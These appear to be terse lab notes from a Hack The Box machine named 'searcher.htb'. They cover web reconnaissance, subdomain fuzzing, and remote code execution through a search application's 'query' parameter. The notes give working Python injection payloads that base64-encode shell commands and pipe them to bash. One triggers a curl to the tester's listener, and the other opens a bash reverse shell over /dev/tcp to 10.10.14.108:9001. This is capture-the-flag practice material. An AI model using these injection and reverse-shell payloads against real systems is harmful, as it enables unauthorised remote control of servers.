# Recognition

Jammy 22.04 LTS

`whatweb http://10.129.175.69`
http://10.129.175.69 [302 Found] Apache[2.4.52], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], IP[10.129.175.69], RedirectLocation[http://searcher.htb/], Title[302 Found]
ERROR Opening: http://searcher.htb/ - no address for searcher.htb

`curl -s http://searcher.htb -I`
HTTP/1.1 200 OK
Date: Fri, 16 Jun 2023 22:08:30 GMT
Server: Werkzeug/2.1.2 Python/3.10.6
Content-Type: text/html; charset=utf-8
Content-Length: 13519

## Subdomain fuzzing

`wfuzz -c -u "http://searcher.htb" -H "Host: FUZZ.searcher.htb" -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -f subdomains/searcher-subdomains,raw --hw=26`

## RCE Payload Burpsuite

`echo -n 'curl 10.10.14.108:8000' | base64 -w0`

engine=Bing&query=',**import**('os').system('echo Y3VybCAxMC4xMC4xNC4xMDg6ODAwMA==|base64 -d|bash'))#

└─$ python3 -m http.server 8000  
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
127.0.0.1 - - [16/Jun/2023 18:51:45] "GET / HTTP/1.1" 200 -
10.129.175.69 - - [16/Jun/2023 19:03:03] "GET / HTTP/1.1" 200 -

Burpsuite vulnerability
`echo -ne "bash -c 'bash -i >& /dev/tcp/10.10.14.108/9001 0>&1'" | base64 | sed -r 's/[+]+/%2B/g'
engine=Bing&query=',**import**('os').system('echo YmFzaCAtYyAnYmFzaCAtaSA%2BJiAvZGV2L3RjcC8xMC4xMC4xNC4xMDgvOTAwMSAwPiYxJw==|base64 -d|bash'))#
